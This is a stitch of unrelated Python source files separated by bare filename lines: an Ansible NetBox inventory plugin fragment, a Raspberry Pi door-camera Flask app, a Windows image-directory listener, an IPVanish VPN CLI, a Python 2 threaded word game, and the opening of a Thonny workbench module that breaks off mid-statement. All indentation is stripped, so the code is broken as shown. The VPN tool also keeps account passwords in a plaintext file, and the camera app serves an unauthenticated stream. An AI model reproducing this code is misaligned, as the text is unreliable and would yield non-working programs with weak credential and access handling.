del ipaddress_copy["interface"]
@property
def lookup_processes(self):
lookups = [
self.refresh_sites_lookup,
self.refresh_regions_lookup,
self.refresh_locations_lookup,
self.refresh_tenants_lookup,
self.refresh_racks_lookup,
self.refresh_rack_groups_lookup,
self.refresh_device_roles_lookup,
self.refresh_platforms_lookup,
self.refresh_device_types_lookup,
self.refresh_manufacturers_lookup,
self.refresh_clusters_lookup,
]
if self.interfaces:
lookups.append(self.refresh_interfaces)
if self.prefixes:
lookups.append(self.refresh_prefixes)
if self.services:
lookups.append(self.refresh_services)
return lookups
@property
def lookup_processes_secondary(self):
lookups = []
# IP addresses are needed for either interfaces or dns_name options
if self.interfaces or self.dns_name or self.ansible_host_dns_name:
lookups.append(self.refresh_ipaddresses)
return lookups
def refresh_lookups(self, lookups):
# Exceptions that occur in threads by default are printed to stderr, and ignored by the main thread
# They need to be caught, and raised in the main thread to prevent further execution of this plugin
thread_exceptions = []
def handle_thread_exceptions(lookup):
def wrapper():
try:
lookup()
except Exception as e:
# Save for the main-thread to re-raise
# Also continue to raise on this thread, so the default handler can run to print to stderr
thread_exceptions.append(e)
raise e
return wrapper
thread_list = []
try:
for lookup in lookups:
thread = Thread(target=handle_thread_exceptions(lookup))
thread_list.append(thread)
thread.start()
for thread in thread_list:
thread.join()
# Wait till we've joined all threads before raising any exceptions
for exception in thread_exceptions:
raise exception
finally:
# Avoid retain cycles
thread_exceptions = None
def fetch_api_docs(self):
try:
status = self._fetch_information(self.api_endpoint + "/api/status")
netbox_api_version = ".".join(status["netbox-version"].split(".")[:2])
except Exception:
netbox_api_version = 0
tmp_dir = os.path.split(DEFAULT_LOCAL_TMP)[0]
tmp_file = os.path.join(tmp_dir, "netbox_api_dump.json")
try:
with open(tmp_file) as file:
openapi = json.load(file)
except Exception:
openapi = {}
cached_api_version = openapi.get("info", {}).get("version")
if netbox_api_version != cached_api_version:
openapi = self._fetch_information(
self.api_endpoint + "/api/docs/?format=openapi"
)
with open(tmp_file, "w") as file:
json.dump(openapi, file)
self.api_version = version.parse(openapi["info"]["version"])
self.allowed_device_query_parameters = [
p["name"] for p in openapi["paths"]["/dcim/devices/"]["get"]["parameters"]
]
self.allowed_vm_query_parameters = [
p["name"]
for p in openapi["paths"]["/virtualization/virtual-machines/"]["get"][
"parameters"
]
]
def validate_query_parameter(self, parameter, allowed_query_parameters):
if not (isinstance(parameter, dict) and len(parameter) == 1):
self.display.warning(
"Warning query parameters %s not a dict with a single key." % parameter
)
return None
k = tuple(parameter.keys())[0]
v = tuple(parameter.values())[0]
if not (k in allowed_query_parameters or k.startswith("cf_")):
msg = "Warning: %s not in %s or starting with cf (Custom field)" % (
k,
allowed_query_parameters,
)
self.display.warning(msg=msg)
return None
return k, v
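# Illustrative sketch with hypothetical filters:
# {"role": "server"} -> ("role", "server") when "role" is an allowed parameter
# {"cf_foo": "bar"} -> ("cf_foo", "bar") since custom fields ("cf_" prefix) always pass
# {"bogus": "x"} -> None, plus a displayed warning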
def filter_query_parameters(self, parameters, allowed_query_parameters):
return filter(
lambda parameter: parameter is not None,
# For each element of query_filters, test if it's allowed
map(
# Create a partial function with the device-specific list of query parameters
partial(
self.validate_query_parameter,
allowed_query_parameters=allowed_query_parameters,
),
parameters,
),
)
def refresh_url(self):
device_query_parameters = [("limit", 0)]
vm_query_parameters = [("limit", 0)]
device_url = self.api_endpoint + "/api/dcim/devices/?"
vm_url = self.api_endpoint + "/api/virtualization/virtual-machines/?"
# Add query_filters to both the devices and VMs queries, if they're valid
if isinstance(self.query_filters, Iterable):
device_query_parameters.extend(
self.filter_query_parameters(
self.query_filters, self.allowed_device_query_parameters
)
)
vm_query_parameters.extend(
self.filter_query_parameters(
self.query_filters, self.allowed_vm_query_parameters
)
)
if isinstance(self.device_query_filters, Iterable):
device_query_parameters.extend(
self.filter_query_parameters(
self.device_query_filters, self.allowed_device_query_parameters
)
)
if isinstance(self.vm_query_filters, Iterable):
vm_query_parameters.extend(
self.filter_query_parameters(
self.vm_query_filters, self.allowed_vm_query_parameters
)
)
# When query_filters is Iterable, and is not empty:
# - If none of the filters are valid for devices, do not fetch any devices
# - If none of the filters are valid for VMs, do not fetch any VMs
# If either device_query_filters or vm_query_filters are set,
# device_query_parameters and vm_query_parameters will have > 1 element so will continue to be requested
if self.query_filters and isinstance(self.query_filters, Iterable):
if len(device_query_parameters) <= 1:
device_url = None
if len(vm_query_parameters) <= 1:
vm_url = None
# Append the parameters to the URLs
if device_url:
device_url = device_url + urlencode(device_query_parameters)
if vm_url:
vm_url = vm_url + urlencode(vm_query_parameters)
# Exclude config_context if not required
if not self.config_context:
if device_url:
device_url = device_url + "&exclude=config_context"
if vm_url:
vm_url = vm_url + "&exclude=config_context"
return device_url, vm_url
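# Illustrative sketch with hypothetical values: given api_endpoint
# "http://localhost:8000", query_filters [{"role": "server"}] and
# config_context disabled, the device URL built above would be
# "http://localhost:8000/api/dcim/devices/?limit=0&role=server&exclude=config_context"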
def fetch_hosts(self):
device_url, vm_url = self.refresh_url()
self.devices_list = []
self.vms_list = []
if device_url:
self.devices_list = self.get_resource_list(device_url)
if vm_url:
self.vms_list = self.get_resource_list(vm_url)
# Allow looking up devices/vms by their ids
self.devices_lookup = {device["id"]: device for device in self.devices_list}
self.vms_lookup = {vm["id"]: vm for vm in self.vms_list}
# There's nothing that explicitly says if a host is virtual or not - add in a new field
for host in self.devices_list:
host["is_virtual"] = False
for host in self.vms_list:
host["is_virtual"] = True
def extract_name(self, host):
# A host in an Ansible inventory requires a hostname.
# name is a unique but not required attribute for a device in NetBox.
# We default to a UUID for the hostname in case the name is not set in NetBox.
# Use virtual chassis name if set by the user.
if self.virtual_chassis_name and self._get_host_virtual_chassis_master(host):
return host["virtual_chassis"]["name"] or str(uuid.uuid4())
else:
return host["name"] or str(uuid.uuid4())
def generate_group_name(self, grouping, group):
# Check for special case - if group is a boolean, just return grouping name instead
# eg. "is_virtual" - returns true for VMs, should put them in a group named "is_virtual", not "is_virtual_True"
if isinstance(group, bool):
if group:
return grouping
else:
# Don't create the inverse group
return None
# Special case. Extract name from service, which is a hash.
if grouping == "services":
group = group["name"]
grouping = "service"
if grouping == "status":
group = group["value"]
if self.group_names_raw:
return group
else:
return "_".join([grouping, group])
def add_host_to_groups(self, host, hostname):
site_group_by = self._pluralize_group_by("site")
for grouping in self.group_by:
# Don't handle regions here since no hosts are ever added to region groups
# Sites and locations are also specially handled in the main()
if grouping in ["region", site_group_by, "location"]:
continue
if grouping not in self.group_extractors:
raise AnsibleError(
'group_by option "%s" is not valid. Check group_by documentation or check the plurals option. It can determine what group_by options are valid.'
% grouping
)
groups_for_host = self.group_extractors[grouping](host)
if not groups_for_host:
continue
# Make groups_for_host a list if it isn't already
if not isinstance(groups_for_host, list):
groups_for_host = [groups_for_host]
for group_for_host in groups_for_host:
group_name = self.generate_group_name(grouping, group_for_host)
if not group_name:
continue
# Group names may be transformed by the ansible TRANSFORM_INVALID_GROUP_CHARS setting
# add_group returns the actual group name used
transformed_group_name = self.inventory.add_group(group=group_name)
self.inventory.add_host(group=transformed_group_name, host=hostname)
def _add_site_groups(self):
# Map site id to transformed group names
self.site_group_names = dict()
for (
site_id,
site_name,
) in self.sites_lookup_slug.items(): # "Slug" only. Data not used for grouping
site_group_name = self.generate_group_name(
self._pluralize_group_by("site"), site_name
)
# Add the site group to get its transformed name
site_transformed_group_name = self.inventory.add_group(
group=site_group_name
)
self.site_group_names[site_id] = site_transformed_group_name
def _add_region_groups(self):
# Mapping of region id to group name
region_transformed_group_names = self._setup_nested_groups(
"region", self.regions_lookup, self.regions_parent_lookup
)
# Add site groups as children of region groups
for site_id in self.sites_lookup:
region_id = self.sites_region_lookup.get(site_id, None)
if region_id is None:
continue
self.inventory.add_child(
region_transformed_group_names[region_id],
self.site_group_names[site_id],
)
def _add_location_groups(self):
# Mapping of location id to group name
self.location_group_names = self._setup_nested_groups(
"location", self.locations_lookup, self.locations_parent_lookup
)
# Add top-level location groups as children of their site groups
for location_id, location_slug in self.locations_lookup.items():
if self.locations_parent_lookup.get(location_id, None):
# Only top level locations should be children of sites
continue
site_transformed_group_name = self.site_group_names[
self.locations_site_lookup[location_id]
]
self.inventory.add_child(
site_transformed_group_name, self.location_group_names[location_id]
)
def _setup_nested_groups(self, group, lookup, parent_lookup):
# Mapping of id to group name
transformed_group_names = dict()
# Create groups for each object
for obj_id in lookup:
group_name = self.generate_group_name(group, lookup[obj_id])
transformed_group_names[obj_id] = self.inventory.add_group(group=group_name)
# Now that all groups exist, add relationships between them
for obj_id in lookup:
group_name = transformed_group_names[obj_id]
parent_id = parent_lookup.get(obj_id, None)
if parent_id is not None and parent_id in transformed_group_names:
parent_name = transformed_group_names[parent_id]
self.inventory.add_child(parent_name, group_name)
return transformed_group_names
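# Illustrative walk-through of _setup_nested_groups for regions (hypothetical data,
# default naming options):
#   lookup        = {1: "emea", 2: "emea-north"}
#   parent_lookup = {2: 1}
# The first loop creates the groups "region_emea" and "region_emea-north"; the second
# loop calls inventory.add_child("region_emea", "region_emea-north"), so nested regions
# become nested inventory groups. The returned dict maps each id to its final group name.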
def _fill_host_variables(self, host, hostname):
extracted_primary_ip = self.extract_primary_ip(host=host)
if extracted_primary_ip:
self.inventory.set_variable(hostname, "ansible_host", extracted_primary_ip)
if self.ansible_host_dns_name:
extracted_dns_name = self.extract_dns_name(host=host)
if extracted_dns_name:
self.inventory.set_variable(
hostname, "ansible_host", extracted_dns_name
)
extracted_primary_ip4 = self.extract_primary_ip4(host=host)
if extracted_primary_ip4:
self.inventory.set_variable(hostname, "primary_ip4", extracted_primary_ip4)
extracted_primary_ip6 = self.extract_primary_ip6(host=host)
if extracted_primary_ip6:
self.inventory.set_variable(hostname, "primary_ip6", extracted_primary_ip6)
for attribute, extractor in self.group_extractors.items():
extracted_value = extractor(host)
# Compare with None rather than truthiness, so empty lists/dicts can still become host vars
if extracted_value is None:
continue
# Special case - all group_by options are single strings, but tag is a list of tags
# Keep the groups named singular "tag_sometag", but host attribute should be "tags":["sometag", "someothertag"]
if attribute == "tag":
attribute = "tags"
if attribute == "region":
attribute = "regions"
if attribute == "location":
attribute = "locations"
if attribute == "rack_group":
attribute = "rack_groups"
# Flatten the dict into separate host vars, if enabled
if isinstance(extracted_value, dict) and (
(attribute == "config_context" and self.flatten_config_context)
or (attribute == "custom_fields" and self.flatten_custom_fields)
or (
attribute == "local_context_data"
and self.flatten_local_context_data
)
):
for key, value in extracted_value.items():
self.inventory.set_variable(hostname, key, value)
else:
self.inventory.set_variable(hostname, attribute, extracted_value)
def _get_host_virtual_chassis_master(self, host):
virtual_chassis = host.get("virtual_chassis", None)
if not virtual_chassis:
return None
master = virtual_chassis.get("master", None)
if not master:
return None
return master.get("id", None)
def main(self):
# Get info about the API - version, allowed query parameters
self.fetch_api_docs()
self.fetch_hosts()
# Interface and service lookups depend on the hosts when the fetch_all option is false
self.refresh_lookups(self.lookup_processes)
# Looking up IP Addresses depends on the result of interfaces count_ipaddresses field
# - can skip any device/vm without any IPs
self.refresh_lookups(self.lookup_processes_secondary)
# When grouping by regions, hosts are never added to region groups directly
# When grouping by locations, hosts may be added to either a site group or a location group
# - site groups are added as children of region groups
# - location groups are added as children of site groups
# So we also need the site groups whenever region or location grouping is enabled
site_group_by = self._pluralize_group_by("site")
if (
site_group_by in self.group_by
or "location" in self.group_by
or "region" in self.group_by
):
self._add_site_groups()
# Create groups for locations. Will be a part of site groups.
if "location" in self.group_by and self.api_version >= version.parse("2.11"):
self._add_location_groups()
# Create groups for regions, containing the site groups
if "region" in self.group_by:
self._add_region_groups()
for host in chain(self.devices_list, self.vms_list):
virtual_chassis_master = self._get_host_virtual_chassis_master(host)
if (
virtual_chassis_master is not None
and virtual_chassis_master != host["id"]
):
# Device is part of a virtual chassis, but is not the master
continue
hostname = self.extract_name(host=host)
self.inventory.add_host(host=hostname)
self._fill_host_variables(host=host, hostname=hostname)
strict = self.get_option("strict")
# Composed variables
self._set_composite_vars(
self.get_option("compose"), host, hostname, strict=strict
)
# Complex groups based on Jinja2 conditionals; hosts that satisfy the conditional are added to the group
self._add_host_to_composed_groups(
self.get_option("groups"), host, hostname, strict=strict
)
# Create groups based on variable values and add the corresponding hosts to them
self._add_host_to_keyed_groups(
self.get_option("keyed_groups"), host, hostname, strict=strict
)
self.add_host_to_groups(host=host, hostname=hostname)
# Special processing for sites and locations as those groups were already created
if getattr(self, "location_group_names", None) and host.get("location"):
# Add host to location group when host is assigned to the location
self.inventory.add_host(
group=self.location_group_names[host["location"]["id"]],
host=hostname,
)
elif getattr(self, "site_group_names", None) and host.get("site"):
# Add host to site group when host is NOT assigned to a location
self.inventory.add_host(
group=self.site_group_names[host["site"]["id"]],
host=hostname,
)
def parse(self, inventory, loader, path, cache=True):
super(InventoryModule, self).parse(inventory, loader, path)
self._read_config_data(path=path)
self.use_cache = cache
# NetBox access
token = self.get_option("token")
# Handle extra "/" from api_endpoint configuration and trim if necessary, see PR#49943
self.api_endpoint = self.get_option("api_endpoint").strip("/")
self.timeout = self.get_option("timeout")
self.max_uri_length = self.get_option("max_uri_length")
self.validate_certs = self.get_option("validate_certs")
self.follow_redirects = self.get_option("follow_redirects")
self.config_context = self.get_option("config_context")
self.flatten_config_context = self.get_option("flatten_config_context")
self.flatten_local_context_data = self.get_option("flatten_local_context_data")
self.flatten_custom_fields = self.get_option("flatten_custom_fields")
self.plurals = self.get_option("plurals")
self.interfaces = self.get_option("interfaces")
self.services = self.get_option("services")
self.site_data = self.get_option("site_data")
self.prefixes = self.get_option("prefixes")
self.fetch_all = self.get_option("fetch_all")
self.headers = {
"User-Agent": "ansible %s Python %s"
% (ansible_version, python_version.split(" ", maxsplit=1)[0]),
"Content-type": "application/json",
}
self.cert = self.get_option("cert")
self.key = self.get_option("key")
self.ca_path = self.get_option("ca_path")
if token:
self.headers.update({"Authorization": "Token %s" % token})
# Filter and group_by options
self.group_by = self.get_option("group_by")
self.group_names_raw = self.get_option("group_names_raw")
self.query_filters = self.get_option("query_filters")
self.device_query_filters = self.get_option("device_query_filters")
self.vm_query_filters = self.get_option("vm_query_filters")
self.virtual_chassis_name = self.get_option("virtual_chassis_name")
self.dns_name = self.get_option("dns_name")
self.ansible_host_dns_name = self.get_option("ansible_host_dns_name")
self.main()
|
app.py
|
#!/usr/bin/env python
from importlib import import_module
import os
from flask import Flask, render_template, Response
import time
import threading
from random import random
from events import door_event
import RPi.GPIO as GPIO
RECORD = False
open_time_stamp = 0
input_pin_no = 19
GPIO.setmode(GPIO.BOARD)
GPIO.setup(input_pin_no, GPIO.IN)
class GPIO_Monitor(object):
thread = None  # background thread that monitors the GPIO input
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
# start background frame thread
GPIO_Monitor.thread = threading.Thread(target=self._thread)
GPIO_Monitor.thread.start()
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting GPIO_Monitor thread.')
'''
r_pre = 0
while True:
print("check GPIO")
ran = random()
threshold = 0.91
if ran >= threshold and r_pre < threshold:
RECORD = True
door_event.set()
print(door_event.isSet())
print("Record")
else:
RECORD = False
door_event.clear()
print(door_event.isSet())
if RECORD == False:
time.sleep(2)
else:
time.sleep(40)
'''
# Poll the GPIO pin forever; the recording side is signalled through door_event
while True:
    if GPIO.input(input_pin_no) == 1:
        print('Door is opened!')
        record = True
        door_event.set()
    else:
        record = False
        door_event.clear()
    # check often while idle, back off while a recording is in progress
    time.sleep(2 if not record else 40)
# import camera driver
if os.environ.get('CAMERA'):
Camera = import_module('camera_' + os.environ['CAMERA']).Camera
else:
from camera import Camera
# Raspberry Pi camera module (requires picamera package)
# from camera_pi import Camera
app = Flask(__name__)
@app.route('/')
def index():
print("def index():")
"""Video streaming home page."""
return render_template('index.html')
def gen(camera):
print("def gen(camera):")
"""Video streaming generator function."""
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
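# Sketch of the byte stream gen() produces: each frame is one part of a
# multipart/x-mixed-replace response, e.g. (illustrative):
#   --frame\r\n
#   Content-Type: image/jpeg\r\n
#   \r\n
#   <JPEG bytes>\r\n
# The browser keeps the connection open and swaps in each new part as it arrives.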
@app.route('/video_feed')
def video_feed():
print("def video_feed():")
"""Video streaming route. Put this in the src attribute of an img tag."""
print("Response client")
return Response(gen(camera),
mimetype='multipart/x-mixed-replace; boundary=frame')
if __name__ == '__main__':
#door_event = threading.Event()
gpio_thread = GPIO_Monitor()
camera = Camera()
app.run(host='0.0.0.0', port=9090, threaded=True)
|
fgoImageListener.py
|
import os,cv2,platform
from fgoLogging import getLogger
logger=getLogger('ImageListener')
if platform.system()=='Windows':
import threading,win32con,win32file
class DirListener:
def __init__(self,dir):
self.hDir=win32file.CreateFile(dir,win32con.GENERIC_READ,win32con.FILE_SHARE_READ|win32con.FILE_SHARE_WRITE|win32con.FILE_SHARE_DELETE,None,win32con.OPEN_EXISTING,win32con.FILE_FLAG_BACKUP_SEMANTICS,None)
self.msg=[]
self.lock=threading.Lock()
self.ren=''
def f():
while True:self.add(win32file.ReadDirectoryChangesW(self.hDir,0x1000,False,win32con.FILE_NOTIFY_CHANGE_FILE_NAME|win32con.FILE_NOTIFY_CHANGE_LAST_WRITE,None,None))
threading.Thread(target=f,daemon=True,name=f'DirListener({dir})').start()
def add(self,x):
def onCreated(file):
for i in(i for i in range(len(self.msg)-1,-1,-1)if self.msg[i][1]==file):
if self.msg[i][0]==2:
self.msg[i][0]=3
return
break
self.msg.append([1,file])
def onDeleted(file):
for i in(i for i in range(len(self.msg)-1,-1,-1)if self.msg[i][1]==file):
if self.msg[i][0]==1:
del self.msg[i]
return
if self.msg[i][0]==3:
del self.msg[i]
break
temp=self.msg[i-1][1]
del self.msg[i-1:i+1]
return onDeleted(temp)
self.msg.append([2,file])
def onUpdated(file):
for i in(i for i in range(len(self.msg)-1,-1,-1)if self.msg[i][1]==file):
if self.msg[i][0]==1 or self.msg[i][0]==3:return
if self.msg[i][0]==5:
temp=self.msg[i-1][1]
del self.msg[i-1:i+1]
onDeleted(temp)
return onCreated(file)
break
self.msg.append([3,file])
def onRenamedFrom(file):self.ren=file
def onRenamedTo(file):
for i in range(len(self.msg)-1,-1,-1):
if self.msg[i][1]==file:break
if self.msg[i][1]==self.ren:
if self.msg[i][0]==1:
del self.msg[i]
return onCreated(file)
if self.msg[i][0]==3:
self.msg[i][0]=2
return onCreated(file)
if self.msg[i][0]==5:
self.ren=self.msg[i-1][1]
del self.msg[i-1:i+1]
if self.ren==file:return
break
self.msg+=[[4,self.ren],[5,file]]
with self.lock:[{1:onCreated,2:onDeleted,3:onUpdated,4:onRenamedFrom,5:onRenamedTo}.get(i[0],lambda _:logger.warning(f'Unknown operation {i}'))(i[1])for i in x]
def get(self):
with self.lock:ans,self.msg=self.msg,[]
return ans
else:
class DirListener:
def __init__(self,dir):pass
def get(self):return[]
class ImageListener(dict):
def __init__(self,path,ends='.png'):
super().__init__((file[:-len(ends)],cv2.imread(path+file))for file in os.listdir(path)if file.endswith(ends))
self.path=path
self.ends=ends
self.listener=DirListener(path)
def flush(self):
lastAction=0
oldName=None
def onCreated(name):self[name]=cv2.imread(self.path+name+self.ends)
def onDeleted(name):del self[name]
def onUpdated(name):self[name]=cv2.imread(self.path+name+self.ends)
def onRenamedFrom(name):
nonlocal oldName
if oldName is not None:del self[oldName]
oldName=name
def onRenamedTo(name):self[name]=self[oldName]if lastAction==4 else cv2.imread(self.path+name+self.ends)
for action,name in((action,file[:-len(self.ends)])for action,file in self.listener.get()if file.endswith(self.ends)):
{1:onCreated,2:onDeleted,3:onUpdated,4:onRenamedFrom,5:onRenamedTo}.get(action,lambda _:None)(name)
logger.info(f'{dict(((1,"Create"),(2,"Delete"),(3,"Update"),(4,"RenameFrom"),(5,"RenameTo"))).get(action,None)} {name}')
lastAction=action
if oldName is not None:del self[oldName]
return self
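# Minimal usage sketch (the directory and key names below are hypothetical):
#   images = ImageListener('fgoImage/')   # preloads every *.png as a cv2 image
#   template = images['menu_button']      # keyed by filename without the '.png' suffix
#   images.flush()                        # re-reads files changed on disk; on non-Windows
#                                         # platforms DirListener reports no changes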
|
cmd.py
|
import click
import os
import tempfile
import requests
import zipfile
import sys
import glob
import re
import io
import shutil
import traceback
import threading
import bs4
import beautifultable
from .vpn import IpvanishVPN, IpvanishError
SETTINGS = {
"IPVANISH_PATH": os.path.expanduser("~/.config/ipvanish"),
"CONFIG_URL": "https://www.ipvanish.com/software/configs/configs.zip",
"GEOJSON_URL": "https://www.ipvanish.com/api/servers.geojson",
"IPVANISH_ACCOUNT_URL": "https://account.ipvanish.com",
"CONTEXT": {"help_option_names": ["-h", "--help"]},
}
@click.group(context_settings=SETTINGS["CONTEXT"])
def cli():
"""Manage ipvanish from the cli"""
if not os.path.exists(SETTINGS["IPVANISH_PATH"]):
os.mkdir(SETTINGS["IPVANISH_PATH"])
@cli.command(context_settings=SETTINGS["CONTEXT"])
def sync():
"""Sync ipvanish vpn servers config files"""
try:
with tempfile.TemporaryDirectory() as tmpfolder:
try:
r = requests.get(SETTINGS["CONFIG_URL"], stream=True)
r.raise_for_status()
z = zipfile.ZipFile(io.BytesIO(r.content))
z.extractall(tmpfolder)
zipfolder = os.listdir(tmpfolder)
if len(zipfolder) == 0:
raise IpvanishError
else:
shutil.rmtree(
os.path.join(SETTINGS["IPVANISH_PATH"], "configs"), ignore_errors=True,
)
shutil.copytree(tmpfolder, os.path.join(SETTINGS["IPVANISH_PATH"], "configs"))
click.echo(
f"Ipvanish ovpns files downloaded\n{len(zipfolder)-1} servers available"
)
except Exception:
raise IpvanishError("Failed to update vpn config")
except IpvanishError as e:
click.echo(f"[IpvanishError] {e}", file=sys.stderr)
except Exception:
click.echo(traceback.format_exc(), file=sys.stderr)
def check_auth():
with open(os.path.join(SETTINGS["IPVANISH_PATH"], "auth"), "r", encoding="utf-8") as auth:
username = auth.readline().rstrip("\n")
password = auth.readline().rstrip("\n")
with requests.Session() as s:
r = s.get(f"{SETTINGS['IPVANISH_ACCOUNT_URL']}/login")
r.raise_for_status()
soup = bs4.BeautifulSoup(r.content, "html.parser")
token = soup.find(id="clientToken").attrs["value"]
r = s.post(
f"{SETTINGS['IPVANISH_ACCOUNT_URL']}/validate",
data={"username": username, "password": password, "clientToken": token},
)
r.raise_for_status()
@cli.command(context_settings=SETTINGS["CONTEXT"])
@click.option(
"--force",
"-f",
"force",
is_flag=True,
default=False,
help="Override auth credentials if present",
)
def auth(force):
"""Configure ipvanish auth credentials"""
try:
if force or not os.path.exists(os.path.join(SETTINGS["IPVANISH_PATH"], "auth")):
username = click.prompt("Ipvanish's username: ")
password = click.prompt("Ipvanish's password: ", hide_input=True)
with open(os.path.join(SETTINGS["IPVANISH_PATH"], "auth"), "w") as auth:
click.echo(username, file=auth)
click.echo(password, file=auth)
# Try to verify username and password
try:
check_auth()
except requests.exceptions.HTTPError:
raise IpvanishError("Failed to check the auth credentials")
except IpvanishError as e:
click.echo(f"[IpvanishError] {e}", file=sys.stderr)
except Exception:
click.echo(traceback.format_exc(), file=sys.stderr)
def _get_ipvanish_config_list(countries: list, is_excluded: bool):
config_list = glob.glob(os.path.join(SETTINGS["IPVANISH_PATH"], "configs", "*.ovpn"))
if len(countries) > 0:
L = []
regex = r"ipvanish-(" + r"|".join(countries) + r")-"
for vpn in config_list:
if is_excluded:
if re.search(regex, vpn) is None:
L.append(vpn)  # glob already returned the full path
else:
if re.search(regex, vpn) is not None:
L.append(vpn)  # glob already returned the full path
return L
else:
return config_list  # glob already returns full paths
def _get_ipvanish_geojson(countries: list, is_excluded: bool):
r = requests.get(SETTINGS["GEOJSON_URL"])
if r.status_code == 200:
d = {}
for geo in r.json():
if countries:
if is_excluded:
if geo["properties"]["countryCode"] in countries:
continue
else:
if not geo["properties"]["countryCode"] in countries:
continue
properties = geo["properties"]
countryCode = properties["countryCode"]
if countryCode == "GB":
countryCode = "UK"
city = properties["city"].replace(" ", "-")
hostNameId = properties["hostname"].split(".")[0]
key = f"ipvanish-{countryCode}-{city}-{hostNameId}"
d[key] = properties
return d
return {}
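# Example of the key format built above (illustrative property values):
#   {"countryCode": "GB", "city": "London", "hostname": "lon-a01.ipvanish.com", ...}
#   -> "ipvanish-UK-London-lon-a01"
# which is intended to match the basename of the corresponding .ovpn config file.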
def _get_vpns(countries: list, is_excluded: bool):
config_files = _get_ipvanish_config_list(countries, is_excluded)
if len(config_files) == 0:
raise IpvanishError("There is no available server")
geojson_data = _get_ipvanish_geojson(countries, is_excluded)
vpns = []
threads = []
# Start one ping thread per server, then show progress while waiting for them to finish
for config_file in config_files:
    geojson_id = config_file.split(".ovpn")[0].split("/")[-1]
    vpn = IpvanishVPN(config_file, geojson_data.get(geojson_id, {}))
    vpns.append(vpn)
    thread = threading.Thread(target=vpn.ping_server)
    thread.start()
    threads.append(thread)
with click.progressbar(threads, label="Retrieving vpn data", show_eta=False) as bar:
    for thread in bar:
        thread.join()
return vpns
def process_country(ctx: click.Context, param: click.Parameter, value):
if not value:
return []
countries = value.split(",")
if "UK" in countries:
countries.append("GB")
elif "GB" in countries:
countries.append("UK")
return countries
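# e.g. "--country FR,UK" yields ["FR", "UK", "GB"], so servers are matched whether the
# data uses the "UK" spelling (config filenames) or "GB" (the geojson country code).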
@cli.command(context_settings=SETTINGS["CONTEXT"])
@click.option(
"--country",
"countries",
help="VPN's country code to use",
default="",
callback=process_country,
type=str,
)
@click.option("--not", "is_excluded", help="Filter out country code", is_flag=True, default=False)
@click.pass_context
def info(ctx: click.Context, countries: list, is_excluded: bool):
"""Display ipvanish vpn server status"""
try:
if not os.path.exists(os.path.join(SETTINGS["IPVANISH_PATH"], "auth")):
raise IpvanishError("Auth credentials not configured. Please run commands auth")
vpns = _get_vpns(countries, is_excluded)
vpns.sort()
table = beautifultable.BeautifulTable(max_width=180)
table.set_style(beautifultable.STYLE_BOX_ROUNDED)
table.column_headers = [
"Server",
"City",
"Country",
"Region",
"Ping",
"Capacity",
]
for vpn in vpns:
table.append_row(
[vpn.server, vpn.city, vpn.country, vpn.region, vpn.ping, vpn.capacity]
)
click.echo(table)
except IpvanishError as e:
click.echo(f"[IpvanishError] {e}", file=sys.stderr)
except Exception:
click.echo(traceback.format_exc(), file=sys.stderr)
@cli.command(context_settings=SETTINGS["CONTEXT"])
@click.option(
"--country",
"countries",
help="VPN's country code to use",
default="",
callback=process_country,
type=str,
)
@click.option("--not", "is_excluded", help="Filter out country code", is_flag=True, default=False)
@click.pass_context
def connect(ctx: click.Context, countries: list, is_excluded: bool):
"""Connect to an ipvanish vpn server"""
try:
if not os.path.exists(os.path.join(SETTINGS["IPVANISH_PATH"], "auth")):
raise IpvanishError("Auth credentials not configured. Please run commands auth")
vpns = _get_vpns(countries, is_excluded)
vpns.sort()
click.echo(f"Connecting to {vpns[0]} ...")
vpns[0].connect()
except IpvanishError as e:
click.echo(f"[IpvanishError] {e}", file=sys.stderr)
except Exception:
click.echo(traceback.format_exc(), file=sys.stderr)
|
MainFile.py
|
from threading import Thread
from Display import Display
from time import sleep
from Sound import Sound
#from vr import AudioListener
from vr_no_over_lap import AudioListener
class Status(object):
def __init__(self):
#0- not started
#1- started
#2- Exploded
#3- Closing
self.status=0
#True : change the word
#False: keep the word
self.changeword=False
#Count how many words been shown
self.wordscounter=0
self.currentword=''
def reset(self):
self.status=0
self.changeword=False
self.wordscounter=0
self.currentword=''
def wordupdated(self):
self.changeword=False
self.wordscounter+=1
def getstatus(self):
return self.status
# initialize main classes and game status
status = Status()
print status.getstatus()
disp = Display(status)
sound = Sound(status)
alistner = AudioListener(status)
def Displayfunction():
while status.status!=3:
disp.display()
sleep(0.5)
disp.clear()
print 'Display Thread Ended \n'
displaythread = Thread(target=Displayfunction)
soundthread= Thread(target=sound.SoundOperator)
listnerthread= Thread(target=alistner.AudioListenerOperator)
interpterthread= Thread(target=alistner.AudioInterpreter)
def initialize():
displaythread.start()
soundthread.start()
listnerthread.start()
interpterthread.start()
sleep(2)#Replace with Shaking
status.status=1
status.changeword=True
print '2'
sleep(50)
status.status=2
sleep(2)
status.status=3
disp.clear()
def FinalInitialization():
displaythread.start()
soundthread.start()
listnerthread.start()
interpterthread.start()
#Put with Shaking
status.status=1
status.changeword=True
while 1:
#Game Exploded
if status.status==2:
#Put Shaking Here
status.reset()
status.status=1
status.changeword=True
#Every Second Will Check The game status
sleep(1)
try:
initialize()
except:
status.status=3
|
workbench.py
|
# -*- coding: utf-8 -*-
import ast
import collections
import importlib
import logging
import os.path
import pkgutil
import platform
import queue
import re
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
from threading import Thread
from tkinter import messagebox, ttk
from typing import Any, Callable, Dict, List, Optional, Sequence, Set, Tuple, Type, Union, cast
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
assistance,
get_runner,
get_shell,
is_portable,
languages,
running,
ui_utils,
)
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.editors import EditorNotebook
from thonny.languages import tr
from thonny.misc_utils import (
copy_to_clipboard,
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
create_tooltip,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
)
logger = logging.getLogger(__name__)
SERVER_SUCCESS = "OK"
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
